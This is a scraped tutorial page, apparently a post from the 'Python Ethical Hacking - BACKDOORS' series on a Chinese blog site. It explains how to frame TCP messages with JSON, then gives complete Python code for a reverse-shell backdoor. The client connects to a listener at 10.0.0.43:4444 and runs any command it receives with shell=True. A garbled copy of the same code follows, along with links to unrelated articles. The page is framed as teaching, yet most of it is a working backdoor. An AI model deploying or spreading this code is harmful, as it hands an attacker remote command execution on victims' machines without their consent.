BACKDOORS Sockets

Problem:

  • TCP is stream-based.
  • Difficult to identify the end of message/batch.

Solution:

  • Make sure the message is well defined.
  • Implement a protocol that sends and receives methods conform to.
    • Send the size of the message as a header.
    • Append an end-of-message mark to the end of each message.
    • Serialize the message.

BACKDOORS Serialization

Benefits:

  • Message is well defined, receiver knows if message is incomplete.
  • Can be used to transfer objects(lists, dicts ...etc)

Implementation:

  • JSON and Pickle are common solutions.
  • JSON(Javascript Object Notation) is implemented in many programming languages.
  • Represents objects as text.
  • Widely used when transferring data between clients and servers.

Server Side - Listener Code:

#!/usr/bin/env python

import socket

import json

class Listener:

    def __init__(self, ip, port):

        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

        listener.bind((ip, port))

        listener.listen(0)

        print("[+] Waiting for incoming connections")

        self.connection, address = listener.accept()

        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def execute_remotely(self, command):

        self.reliable_send(command.decode())

        return self.reliable_receive()

    def run(self):

        while True:

            command = input(">> ").encode()

            result = self.execute_remotely(command)

            print(result)

my_listener = Listener("10.0.0.43", 4444)

my_listener.run()

Client Side - Backdoor code:

#!/usr/bin/env python

import json

import socket

import subprocess

class Backdoor:

    def __init__(self, ip, port):

        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        self.connection.connect((ip, port))

    def reliable_send(self, data):

        json_data = json.dumps(data).encode()

        self.connection.send(json_data)

    def reliable_receive(self):

        json_data = ""

        while True:

            try:

                json_data = json_data + self.connection.recv(1024).decode()

                return json.loads(json_data)

            except ValueError:

                continue

    def execute_system_command(self, command):

        return subprocess.check_output(command, shell=True)

    def run(self):

        while True:

            command = self.reliable_receive()

            command_result = self.execute_system_command(command)

            self.reliable_send(command_result.decode())

        connection.close()

my_backdoor = Backdoor("10.0.0.43", 4444)

my_backdoor.run()

Execute result:

#!/usr/bin/env pythonimport jsonimport socketimport subprocess

class Backdoor:    def __init__(self, ip, port):        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        self.connection.connect((ip, port))
    def reliable_send(self, data):        json_data = json.dumps(data).encode()        self.connection.send(json_data)
    def reliable_receive(self):        json_data = ""        while True:            try:                json_data = json_data + self.connection.recv(1024).decode()                return json.loads(json_data)            except ValueError:                continue
    def execute_system_command(self, command):        return subprocess.check_output(command, shell=True)
    def run(self):        while True:            command = self.reliable_receive()            command_result = self.execute_system_command(command)            self.reliable_send(command_result.decode())        connection.close()

my_backdoor = Backdoor("10.0.0.43", 4444)my_backdoor.run()

Python Ethical Hacking - BACKDOORS(3)的更多相关文章

  1. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  2. Python Ethical Hacking - BACKDOORS(1)

    REVERSE_BACKDOOR Access file system. Execute system commands. Download files. Upload files. Persiste ...

  3. Python Ethical Hacking - BACKDOORS(7)

    Handling Errors: If the client or server crashes, the connection will be lost. Backdoor crashes if: ...

  4. Python Ethical Hacking - BACKDOORS(6)

    File Upload: A file is a series of characters. Uploading a file is the opposite of downloading a fil ...

  5. Python Ethical Hacking - BACKDOORS(5)

    File Download: A file is a series of characters. Therefore to transfer a file we need to: 1. Read th ...

  6. Python Ethical Hacking - BACKDOORS(4)

    REVERSE_BACKDOOR - cd command Access file system: cd command changes current working directory. It h ...

  7. Python Ethical Hacking - BACKDOORS(2)

    Refactoring - Creating a Listener Class #!/usr/bin/env python import socket class Listener: def __in ...

  8. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  9. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

随机推荐

  1. vulstack红队评估(三)

    一.环境搭建: ①根据作者公开的靶机信息整理 没有虚拟机密码,纯黑盒测试...一共是5台机器,目标是拿下域控获取flag文件   ②虚拟机网卡设置 centos双网卡模拟内外网: 外网:192.168 ...

  2. WeChair项目Alpha冲刺(6/10)

    团队项目进行情况 1.昨日进展    Alpha冲刺第六天 昨日进展: 前端:和后端成功交互,页面修改和完善 后端:和前端成功交互,但是数据解密失败,初步编写登录的service层和dao层代码未测试 ...

  3. .NET 5 尝鲜 - 开源项目TerminalMACS WPF管理端支持.NET 5

    .NET 5 尝鲜 - 开源项目TerminalMACS WPF管理端支持.NET 5 一个使用 Prism 作为模块化框架.基于多个开源控件库作为UI控件选择.集成开源 UI 界面设计的 .NET ...

  4. Spring中的AOP(一)

    1. Spring AOP实现机制 Spring采用动态代理机制和字节码生成技术实现AOP.与最初的AspectJ采用编译器将横切逻辑织入目标对象不同,动态代理机制和字节码生成都是在运行期间为目标对象 ...

  5. 3.尚硅谷_MyBatis_HelloWorld.avi

    CREATE TABLE `tbl_employee` ( `id` int(11) NOT NULL AUTO_INCREMENT, `last_name` varchar(255) DEFAULT ...

  6. css的四种使用方式

    方式一:内联样式 内联样式,也叫行内样式,指的是直接在style属性中添加CSS 示例: <DIV style="display: none;background:red"& ...

  7. 【数位dp+状压】XHXJ 's LIS

    题目 define xhxj (Xin Hang senior sister(学姐)) If you do not know xhxj, then carefully reading the enti ...

  8. Spring Cloud Alibaba基础教程:Nacos 生产级版本 0.8.0

    昨晚Nacos社区发布了第一个生产级版本:0.8.0.由于该版本除了Bug修复之外,还提供了几个生产管理非常重要的特性,所以觉得还是有必要写一篇讲讲这次升级,在后续的文章中也都将以0.8.0版本为基础 ...

  9. jQuery学习笔记(1)

    什么是jQuery? jQuery是一个js库 jQuery的版本? jQuery1.x jQuery2.x(不支持IE6,7,8) jQuery作用? 简化js编写 将页面与js分离 常见的js库? ...

  10. ant design pro---ProTable关闭Table上的提示信息

    toolBarRender={false} tableAlertRender={false}